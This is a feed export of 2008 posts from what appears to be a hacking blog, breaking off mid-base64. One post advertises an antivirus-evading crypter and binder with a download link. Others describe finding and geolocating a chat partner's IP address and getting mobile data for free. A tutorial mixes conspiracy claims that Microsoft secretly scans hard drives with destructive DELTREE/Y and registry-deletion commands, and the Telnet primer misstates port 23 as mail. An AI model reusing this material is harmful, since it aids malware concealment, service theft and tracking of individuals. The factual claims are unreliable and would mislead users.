hOOm u r cHAttIng.&gt;!&lt;br /&gt;tHis iS bettTEr ThaN tHe sEndINg fIle aND GettINg IP MetHOd.....HErE u dOn"t NeeD tO seND a fILe...!&lt;br /&gt;&lt;br /&gt;tHEn nOtE dAt ip aND SeArcH fOr iTs GEo-lOcatioN hErE.....&lt;br /&gt;http://www.ip-adress.com/&lt;br /&gt;tHis wIll nOt bE thE Pin-POinT pOsitIOn OF tHE PerSon"s hOme ......bUT jUst a rOUgH eStImatE tO amAzE uR fRnds..!&lt;br /&gt;fOr TRacINg BSNL UseRs.....iT maY eVEn sHOw dIfF. cItY.....ExAmplE::::AS In mY cAse////If u Try tO locAte mY Ip wIth tHAt ......u"lL laNd In pUne oR sum oTher aDjaCent cItY ...!&lt;br /&gt;&lt;br /&gt;iF u KNow tHIs ....nO cOmmenTS,....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8795055448356204968?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8795055448356204968/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8795055448356204968' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8795055448356204968'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8795055448356204968'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/ip-via-yahoo-chatting.html' title='IP vIA YahOO cHattIng'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3539953327452714012</id><published>2008-10-22T09:31:00.001-07:00</published><updated>2008-10-22T09:31:47.880-07:00</updated><title type='text'>Free IDEA GPRS Hack/Trick - Working in some states</title><content type='html'>Thursday, October 16th, 2008&lt;br /&gt;&lt;br /&gt;There are number of free airtel gprs tricks available but very few are available for idea or Vodafone. So here I m presenting another idea trick for free gprs and internet on your mobile phone. But as I always say these tricks don’t work for a long time as the service providers are now using better tracking systems and hence they block the proxies as soon as they come across them. So try this out and enjoy free idea gprs if it works for you.&lt;br /&gt;&lt;br /&gt;One more thing that I will like to tell you all is that even the proxies are also area specific, so if you can’t run free gprs, you should try searching for new proxies. Before you get this trick working you must ensure the following criteria:&lt;br /&gt;&lt;br /&gt;1. You balance must be between Rs.15 to Rs.20.&lt;br /&gt;2. Send the activation message only once.&lt;br /&gt;3. Always use proxy servers for opening any site.&lt;br /&gt;4. For using internet from pc or laptop take care that you use smart browser to surf internet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3539953327452714012?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3539953327452714012/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3539953327452714012' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3539953327452714012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3539953327452714012'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/10/free-idea-gprs-hacktrick-working-in.html' title='Free IDEA GPRS Hack/Trick - Working in some states'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-7416583952887029826</id><published>2008-10-22T09:30:00.000-07:00</published><updated>2008-10-22T09:31:04.482-07:00</updated><title type='text'>ALL IN ONE Crypter - Binder</title><content type='html'>October 22nd, 2008&lt;br /&gt;&lt;br /&gt;The crypter stub is 97% undetectable only 3 antiviruses can detect and the binder is 98% undetectable only 2 antiviruses can detect it.&lt;br /&gt;&lt;br /&gt;Crypter info:&lt;br /&gt;EOF Data&lt;br /&gt;Encryption&lt;br /&gt;Decryption&lt;br /&gt;Execute file&lt;br /&gt;Icon Change&lt;br /&gt;RC4&lt;br /&gt;After Crypt Pack File&lt;br /&gt;&lt;br /&gt;Binder info:&lt;br /&gt;many Files Bind&lt;br /&gt;shellAPI&lt;br /&gt;Execute save in .&lt;br /&gt;&lt;br /&gt;Download Link: http://www.4shared.com/file/67951878/4ae843ec/All_in1.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-7416583952887029826?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/7416583952887029826/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=7416583952887029826' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7416583952887029826'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7416583952887029826'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/10/all-in-one-crypter-binder.html' title='ALL IN ONE Crypter - Binder'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3844433544773105437</id><published>2008-09-26T12:21:00.000-07:00</published><updated>2008-09-26T12:22:30.031-07:00</updated><title type='text'>All about Telnet 101</title><content type='html'>Don't use this for illegal stuff::&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Introduction:&lt;br /&gt;&lt;br /&gt;Telnet is used to connect to remote machines through emulation. This means that&lt;br /&gt;it can connect to a server, any server instantly because of it's ability to emulate (copy)&lt;br /&gt;remote computers.&lt;br /&gt;&lt;br /&gt;Lets Start:&lt;br /&gt;&lt;br /&gt;In Windows, Telnet can be found by going to Start -&gt; Run and then typing telnet.&lt;br /&gt;The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.&lt;br /&gt;&lt;br /&gt;If you click Connect, you should see more options. Here they are.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Connect:&lt;br /&gt;&lt;br /&gt;Remote System..&lt;br /&gt;Disconnect&lt;br /&gt;&lt;br /&gt;Exit&lt;br /&gt;&lt;br /&gt;Names of servers you have been on.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To connect to a server, click Remote System...&lt;br /&gt;&lt;br /&gt;This will then take you to a dialog box that has these fields:&lt;br /&gt;&lt;br /&gt;Hostname:&lt;br /&gt;Port:&lt;br /&gt;TermType:&lt;br /&gt;&lt;br /&gt;There should also be a Connect button and a Cancel Button.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lets go over these &amp; what you should put in them.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Hostname-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Hostname can be the address of the website your going to be connecting to:&lt;br /&gt;&lt;br /&gt;http://www.oreos.com&lt;br /&gt;&lt;br /&gt;or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)&lt;br /&gt;&lt;br /&gt;an IP Address looks like this:&lt;br /&gt;&lt;br /&gt;210.111.23.45&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Port-&lt;br /&gt;&lt;br /&gt;Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)&lt;br /&gt;&lt;br /&gt;or you can keep it Telnet and see what happens.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-TermType-&lt;br /&gt;&lt;br /&gt;TermType is the type of Terminal telnet will be acting like.&lt;br /&gt;This doesn't matter most of the time, so you can keep it to default or try other ones if you want.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;When you have all this set up, you can Click Connect &amp; see what happens.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.&lt;br /&gt;&lt;br /&gt;Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.&lt;br /&gt;&lt;br /&gt;Ok that's all for the Connect Menu, lets go over the Terminal menu.&lt;br /&gt;&lt;br /&gt;The terminal menu should have 3 options:&lt;br /&gt;&lt;br /&gt;Prefernces&lt;br /&gt;Start Logging&lt;br /&gt;Stop Logging.&lt;br /&gt;&lt;br /&gt;-Prefernces-&lt;br /&gt;&lt;br /&gt;If you go to this, a dialog box will come up with various options. Here, you can change the&lt;br /&gt;text color &amp; background color of the program, and you can enable Local Echo, which shows&lt;br /&gt;you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not uncheck, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emualtion type, always have this set on the default unless you know what the second one is and you know what your doing.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Start Logging-&lt;br /&gt;&lt;br /&gt;This logs everything you do on Telnet in a log file on your computer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Stop Logging-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This will stop logging processes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3844433544773105437?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3844433544773105437/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3844433544773105437' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3844433544773105437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3844433544773105437'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/all-about-telnet-101.html' title='All about Telnet 101'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8195468679170844724</id><published>2008-09-26T12:18:00.002-07:00</published><updated>2008-09-26T12:19:54.056-07:00</updated><title type='text'>The Information Microsoft Hides on Your Computer</title><content type='html'>Here are folders on your computer that Microsoft has tried hard to keep secret. Within these folders you will find two (major) things: Microsoft Internet Explorer has been logging all of the sites you have ever visited -- even after you've cleared your cache, and Microsoft's Outlook and Outlook Express has been logging ALL of your e-mail correspondence -- even after you've erased them from your trashbin. (This also includes all incoming and outgoing e-mail attachments.) And believe me, that's not even the half of it.&lt;br /&gt;When I say that these files are hidden well, I really mean it. If you don't have any knowledge of DOS, then don't plan on finding these files on your own. I say this because some of these files will only be found in DOS while some of these folders can only be found in Windows Explorer. Additionally, there are some folders that will not be displayed by neither DOS nor Explorer -- but can only be found using a workaround. Basically what I am saying is if you didn't know these files existed then the chances of you running across them is slim to slimmer.&lt;br /&gt;To give you an example of how sneaky this is, there are three hidden folders that may contain your name, address, phone, all the sites you've visited, every single e-mail you've sent/received, every attachment you've ever sent/received, everything you've searched for in a search engine, every filename you've downloaded, names of documents containing "sensitive" information, copies of all your cookies, full readable e-mail from your hotmail account, your PGP keys, and more.&lt;br /&gt;Funny that Microsoft would make no mention of this on microsoft.com.&lt;br /&gt;FORWARD:&lt;br /&gt;I know there are some people out there that are already aware of some of the things I mention. I also know that most people are not. The purpose of this tutorial is teach people what is really going on with Microsoft's products and how to take control of their privacy again.&lt;br /&gt;Thanks for reading.&lt;br /&gt;INDEX&lt;br /&gt;1. DEFINITIONS AND ACRONYMS&lt;br /&gt;2. WHY YOU SHOULD ERASE THESE FILES&lt;br /&gt;3. HOW TO ERASE THE FILES ASAP (Recommended for the non-savvy.)&lt;br /&gt;3.1) If You Own Microsoft Internet Explorer&lt;br /&gt;3.2) Clearing Your Registry&lt;br /&gt;3.3) If You Own Outlook Express&lt;br /&gt;3.4) Slack files&lt;br /&gt;3.5) Keeping Microsoft Internet Explorer (Not recommended at all.)&lt;br /&gt;4. STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES (For the savvy.)&lt;br /&gt;5. A LOOK AT OUTLOOK&lt;br /&gt;6. HOW MICROSOFT DOES IT&lt;br /&gt;7. +S MEANS [S]ECRET NOT [S]YSTEM&lt;br /&gt;8. THE TRUTH ABOUT FIND FAST&lt;br /&gt;8.1) Removing Find Fast&lt;br /&gt;9. HOW HARD MICROSOFT TRIED TO KEEP PEOPLE FROM FINDING ABOUT IT&lt;br /&gt;10. FINAL NOTE AND CONTACT INFORMATION&lt;br /&gt;10.1) Recommended reading&lt;br /&gt;11. SPECIAL THANKS&lt;br /&gt;12. REFERENCES&lt;br /&gt;Coming Very Soon:&lt;br /&gt;mailbox.pst&lt;br /&gt;pstores&lt;br /&gt;Related Windows Tricks.&lt;br /&gt;Reflection of why they use alphanumeric folders (9J3X7QZF4.)&lt;br /&gt;Everything you didn't want to know about Find Fast.&lt;br /&gt;The NSA-Key.&lt;br /&gt;The [Microsoft Update] button.&lt;br /&gt;Why the temp folders aren't intended to be temporary at all.&lt;br /&gt;What's in those .dbx files?&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;1. DEFINITIONS AND ACRONYMS&lt;br /&gt;Well, the best definition I have been able to come up with is the following:&lt;br /&gt;I) A "really hidden" file/folder is one that cannot be seen in Windows Explorer after enabling it to view all files, cannot be seen in MS-DOS after receiving a directory listing, and cannot be searched through using the "Find" utility.&lt;br /&gt;a) There is at least one workaround to enabling Explorer to see them.&lt;br /&gt;b) There is at least one workaround to enabling MS-DOS to see them.&lt;br /&gt;c) There is at least one workaround to enabling the "Find" utility to search through them.&lt;br /&gt;d) They are hidden intentionally.&lt;br /&gt;II) Distinguishes "really hidden" file/folders from just plain +h[idden] ones, such as your "MSDOS.SYS" or "Sysbckup" folder.&lt;br /&gt;III) Distinguishes from certain "other" intended hidden files, such as a file with a name of "šŸëœx¥."&lt;br /&gt;DOS = Disk Operating System&lt;br /&gt;MSIE = Microsoft Internet Explorer&lt;br /&gt;TIF = Temporary Internet Files (folder)&lt;br /&gt;HD = Hard Drive&lt;br /&gt;OS = Operating System&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;2. WHY SHOULD I ERASE THESE FILES?&lt;br /&gt;1) Besides the glaring privacy risks.&lt;br /&gt;2) Besides the fact that Microsoft is keeping these logs intentionally. (For reasons I can only imagine.)&lt;br /&gt;3) These files can take up huge amounts of disk space. I've personally inspected a computer with almost 200 megs of this stuff, so you can imagine how much this can slow your computer down. After following these instructions you will probably notice a great improvement in performance.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;3. HOW TO ERASE THE FILES ASAP&lt;br /&gt;Step by step information on how to erase these files as soon as possible. This section is recommended for the non-savvy. Further explanation can be found in Section 4.0. Please note that following these next steps will erase all your cache files, all your cookie files, and all of your e-mail correspondence. If you use the offline content feature with MSIE, following these next steps will remove this as well.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;3.1. IF YOU OWN A COPY OF MICROSOFT INTERNET EXPLORER&lt;br /&gt;1) Shut your computer down, and turn it back on.&lt;br /&gt;2) While your computer is booting keep pressing the [F8] key until you are given an option screen.&lt;br /&gt;3) Choose "Command Prompt Only" (This will take you to true DOS mode.)&lt;br /&gt;4) When your computer is done booting, you will have a C:&gt; followed by a blinking cursor. Type in this hitting enter after each line.&lt;br /&gt;&lt;br /&gt;CDWINDOWSTEMPOR~1&lt;br /&gt;DELTREE/Y CONTENT.IE5&lt;br /&gt;(If that didn't work then type this:)&lt;br /&gt;&lt;br /&gt;CDWINDOWSAPPLIC~1TEMPOR~1&lt;br /&gt;DELTREE/Y CONTENT.IE5&lt;br /&gt;(If that didn't work then type this:)&lt;br /&gt;&lt;br /&gt;CDWINDOWSLOCALS~1TEMPOR~1&lt;br /&gt;DELTREE/Y CONTENT.IE5&lt;br /&gt;(If this still does not work, and you are sure you are using MSIE5, then please e-mail me. Finding the location of these is a mission, and I'd certainly like to know where else MSIE likes to hide its cache. I believe older versions of MSIE keep them under "c:windowscontent".)&lt;br /&gt;5) This will take a ridiculous amount of time to process. The longer it takes, the more records Microsoft had stored about you. When it gets done erasing that folder, then type this:&lt;br /&gt;&lt;br /&gt;CD&lt;br /&gt;DELTREE/Y TEMP&lt;br /&gt;DELTREE/Y WIN386.SWP&lt;br /&gt;CD WINDOWS&lt;br /&gt;DELTREE/Y COOKIES&lt;br /&gt;DELTREE/Y TEMP&lt;br /&gt;DELTRE/Y WIN386.SWP&lt;br /&gt;DELTREE/Y HISTORY&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;3.2. CLEARING YOUR REGISTRY&lt;br /&gt;Reboot your computer and wait for Windows to load back up.&lt;br /&gt;1) Drop to DOS ("Start" &gt; "Program Files" &gt; "MS-DOS Prompt") and type this at prompt:&lt;br /&gt;&lt;br /&gt;regedit&lt;br /&gt;2) Your Registry Editor will pop up. Go to "Edit" &gt; "Find"&lt;br /&gt;3) Type in "TypedURLs" and then hit [Find Next]. You will be taken to all the places you've typed in URLs manually. 4) Erase any URLs that you find. Do not erase the folders. (They will be called "01," "02," "03," etc...) Double click on them to make sure they are URLs. I found mine here:&lt;br /&gt;&lt;br /&gt;HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs/&lt;br /&gt;HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs/&lt;br /&gt;5) and while you're in here you might as well go here:&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current&lt;br /&gt;Version/Explorer/RemoteComputer/NameSpace/&lt;br /&gt;{d6277990-4c6a-11cf-8d87-00aa0060f5b5}&lt;br /&gt;6) Delete the {d6277990-4c6a-11cf-8d87-00aa0060f5b5} key. This will make the "Find: Files or Folders" utility perform searches much faster.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;3.3. IF YOU HAVE OUTLOOK OR OUTLOOK EXPRESS INSTALLED&lt;br /&gt;1) Install another e-mail program like Eudora, or Pegasus Mail. Make sure everything is setup correctly.&lt;br /&gt;2) Backup any e-mail that you wish to save. (Print them out, or forward them to another box.)&lt;br /&gt;3) Uninstall Outlook.&lt;br /&gt;Warning, this conveniently does not erase any e-mail correspondence. To double check drop back to your DOS prompt and type this:&lt;br /&gt;&lt;br /&gt;dir *.mbx /s/p&lt;br /&gt;dir *.mbx /s/p/ah&lt;br /&gt;The files you are looking for are:&lt;br /&gt;INBOX.MBX&lt;br /&gt;OUTBOX.MBX&lt;br /&gt;SENTIT~1.MBX&lt;br /&gt;DELETE~1.MBX&lt;br /&gt;DRAFTS.MBX&lt;br /&gt;If these files come up they will be listed in either of these folders:&lt;br /&gt;&lt;br /&gt;C:WindowsApplication DataMicrosoftOutlook ExpressMail&lt;br /&gt;C:Program Filesinternet mail and news%USER%mail&lt;br /&gt;(If the .mbx files are located anywhere else then you probably don't want to delete them since they aren't from outlook. If they are from outlook, however, then please e-mail me.)&lt;br /&gt;Now type either of the following (depending on the location of your .mbx files). Remember, this will erase all your e-mail correspondence so backup what you want to keep by printing them out or forwarding them to another box. Hopefully by now you have already set up Eudora or Pegasus Mail.&lt;br /&gt;&lt;br /&gt;CDWINDOWSAPPLIC~1MICROS~1OUTLOO~1&lt;br /&gt;DELTREE/Y MAIL&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;CDPROGRA~1INTERN~1%USER%&lt;br /&gt;(replace "%user%" with the proper name.)&lt;br /&gt;&lt;br /&gt;DELTREE/Y MAIL&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;3.4. SLACK FILES&lt;br /&gt;As you may already know, deleting files only deletes the references to them. They are in fact still sitting there on your HD and can be easily recovered by anyone.&lt;br /&gt;&lt;br /&gt;BCWipe is a nice program that will clear these files.&lt;br /&gt;For you DOS buffs, there's a program called FileDust that got a 5 star rating on ZDNET, if that matters.&lt;br /&gt;If you are using PGP then there is a "Freespace Wipe" option under PGPtools.&lt;br /&gt;Norton Utilities has a nice filewiping utility.&lt;br /&gt;You might want to check out Evidence Eliminator's 30 day trial. This is probably the best program as far as your privacy goes.&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;3.5. KEEPING MICROSOFT INTERNET EXPLORER&lt;br /&gt;If you insist on using Microsoft Internet Explorer then I strongly recommend that you check out at least one of these programs:&lt;br /&gt;&lt;br /&gt;PurgeIE&lt;br /&gt;Anonymizer Window Washer&lt;br /&gt;Cache and Cookie Washer for IE&lt;br /&gt;I have already tried and tested some other programs and you'd be surprised on how many of them DON'T pass the tests. For example, HistoryKiller 2001 claims it erases all the files, but don't count on it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;4. STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES&lt;br /&gt;This next section is for those of you who are more interested in learning the ins and outs of your computer. This section is intended for the savvy user.&lt;br /&gt;1) First, drop to DOS and type this at prompt (in all lower-case):&lt;br /&gt;&lt;br /&gt;c:windowsexplorer /e,c:windowstempor~1content.ie5&lt;br /&gt;You see all those alphanumeric names listed under "content.ie5?" (left-hand side) That's Microsoft's idea of making this project as hard as possible. (Earlier versions of Internet Explorer simply called them "cache#.") These are your alphanumeric folders that MSIE has created to keep your cookies and cache. Write these names down. (They should look something like this: 6YQ2GSWF, QRMTKLWF, U7YHQKI4, 7YMZ516U, WQK6Z9UV, etc...) If you click on any of these folders then nothing will be displayed. Not because there aren't any files here, but because Windows Explorer has lied to you. If you want to view the contents of these alphanumeric folders you will have to do so in DOS. (Actually, there is a workaround that Skywalker taught me, but it's a little bit harder to explain. I promise to cover this tip in the next version.)&lt;br /&gt;2) Restart in MS-DOS mode. (You must restart because windows has "locked" down some of the files.)&lt;br /&gt;3) Type this in at prompt:&lt;br /&gt;&lt;br /&gt;CDWINDOWSTEMPOR~1CONTENT.IE5&lt;br /&gt;CD %alphanumeric%&lt;br /&gt;(replace the "%alphanumeric%" with the first name that you just wrote down.)&lt;br /&gt;&lt;br /&gt;DIR/P&lt;br /&gt;Note: Not only are you in a folder that DOS claims does not exist, but you are now looking at cache/cookies that Windows Explorer claims do not exist.&lt;br /&gt;These folders are directly responsible for the mysterious erosion of hard drive space you may have been noticing. Just a couple interesting things you can find in here:&lt;br /&gt;&lt;br /&gt;Pictures from all those porn sites you've visited.&lt;br /&gt;Other internet cache files completely wasting your disk space.&lt;br /&gt;If you use Hotmail (or any webmail service) you can probably see some of your old messages laying around here. To see them for yourself, copy them into another directory and open them with your browser.&lt;br /&gt;Retrieving your personal information from these cookies is a snap. For example if you've ever shopped at Amazon.com then there's access to your name and e-mail. If you're a user on Hollywood.com then there's your city, state, and zip. MP3.com keeps some goodies as well.&lt;br /&gt;Feel free to check out all your alphanumeric folders, before going on to the next step.&lt;br /&gt;5) Type this in:&lt;br /&gt;&lt;br /&gt;CDWINDOWSTEMPOR~1CONTENT.IE5&lt;br /&gt;EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")&lt;br /&gt;You will be brought to a blue screen with a bunch of binary.&lt;br /&gt;6) Press and hold the [Page Down] button until you start seeing lists of URLs. These are all the sites that you've ever visited as well as a brief description of each. You'll notice it records everything you've searched for in a search engine in plain text, in addition to the URL.&lt;br /&gt;7) When you get done searching around you can go to "File" &gt; "Exit."&lt;br /&gt;8) Next you'll probably want to erase these files by typing this:&lt;br /&gt;&lt;br /&gt;DELTREE/Y C:WINDOWSTEMPOR~1&lt;br /&gt;(replace "c:windowstempor~1" with the location of your TIF folder if different.)&lt;br /&gt;This will take a seriously long time to process. Then go check out your History.&lt;br /&gt;9) Type this:&lt;br /&gt;&lt;br /&gt;CDWINDOWSHISTORYHISTORY.IE5&lt;br /&gt;EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")&lt;br /&gt;You will be brought to a blue screen with more binary.&lt;br /&gt;10) Press and hold the [Page Down] button until you start seeing lists of URLS again.&lt;br /&gt;This is another recording of the sites you've visited. There also may be some other things in here. E-mail me if you find anything interesting. I will share with you a snippet of what I found in my index.dat file.&lt;br /&gt;&lt;br /&gt;Client UrlCache&lt;br /&gt;MMF Ver 5.2@&lt;br /&gt;@ 3 yiâ&lt;br /&gt;€&lt;br /&gt;àOÐ ê:+0&lt;br /&gt;0�&lt;br /&gt;'&lt;br /&gt;}*Á� 5.t&lt;br /&gt;xt&lt;br /&gt;59&lt;br /&gt;&lt;br /&gt;MS6C:%&lt;br /&gt;&lt;br /&gt;\DAVE'S&lt;br /&gt;HD.TXT&lt;br /&gt;MSIE5.&lt;br /&gt;C:&lt;br /&gt;Did you note the "C:" and "\DAVE'S HDMSIE5.TXT"?&lt;br /&gt;"Dave" is the fictitious name that I use on my computer. "Dave's HD" is the name of my root folder on my LAN. "MSIE5.TXT" is the name of a text file that I've been saving on my computer. It contains research from THIS project that I've been working on. Mostly URLs and notes.&lt;br /&gt;Do you see anything wrong with this picture? It took notice on a file on my HD, folks. MY HARD DRIVE. Not only that, but it is saving it in a folder that cannot be seen by neither DOS nor Windows Explorer. Is it a coincidence that this file was related to the research of this tutorial?&lt;br /&gt;Obviously, my first suspicion was that Microsoft was scanning my HD and logging any "sensitive" information. In this case, my msie5.txt probably had something in it that Microsoft didn't like. To read more about my findings read "THE TRUTH ABOUT FIND FAST" in section 8.0.&lt;br /&gt;1) If you're still with me, type this:&lt;br /&gt;CDWINDOWSHISTORY&lt;br /&gt;2) check out the mmXXX.dat files (and delete them), then type:&lt;br /&gt;&lt;br /&gt;CDWINDOWSHISTORYHISTORY.IE5&lt;br /&gt;CD MSHIST~1&lt;br /&gt;EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")&lt;br /&gt;More URLs from your internet history. Note there are probably other mshist~x folders here. 3) You can repeat these steps for every occurrence of the mshistxxxxxxxx file.&lt;br /&gt;4) By now you'll probably want to type in this:&lt;br /&gt;&lt;br /&gt;CD WINDOWS&lt;br /&gt;DELTREE/Y HISTORY&lt;br /&gt;This is about it as far as I know. You may also want to take a look at your *.mbx files if you own Outlook. (dir *.mbx/s) More detailed information is covered in the next chapter.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;5. A LOOK AT OUTLOOK EXPRESS&lt;br /&gt;Would you think twice about what you said if you knew it was being recorded? E-mail correspondence leaves a permanent record of everything you've said -- even after you've told Outlook to erase it. You are given a false sense of security sense you've erased it twice, so surely it must be gone. The first time Outlook simply moves it to your "Deleted Items" folder. The second time you erase it Outlook simply "pretends" it is gone. The truth is your messages are still being retained in a "really hidden folder."&lt;br /&gt;Furthermore, as if that wasn't disturbing enough, Outlook Express also keeps records of EVERY SINGLE file attachment in an ENCRYPTED database. Can you believe this, folks?&lt;br /&gt;For example, I attached this zip file and sent it to myself.&lt;br /&gt;&lt;br /&gt;PK '…Ž*}�™ P AAA­À�€ Öø)-8³PK +…Ž*8øM3 P&lt;br /&gt;BBB­À�€ ×ø%-8³PK .…Ž*ÄÖ.� P CCC­À�€ Øø!-8³PK&lt;br /&gt;2…Ž*² å` P DDD­À�€ Ùø -8³PK '…Ž*}�™ P&lt;br /&gt;AAAPK +…Ž*8øM3 P 1BBBPK&lt;br /&gt;.…Ž*ÄÖ.� P bCCCPK 2…Ž*² å` P&lt;br /&gt;"DDDPK ÄÄ&lt;br /&gt;And it recorded this in both my inbox.mbx file and outbox.mbx file:&lt;br /&gt;&lt;br /&gt;UEsDBBQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAAQUFBrcCBAAAAAIAg1vgpljizAFBLAwQUAAAA&lt;br /&gt;CAArhY4qOPhNMxAAAABQAAAAAwAAAEJCQq3AgQAAAACAINf4JZY4swBQSwMEFAAAAAgALoWOKsTW&lt;br 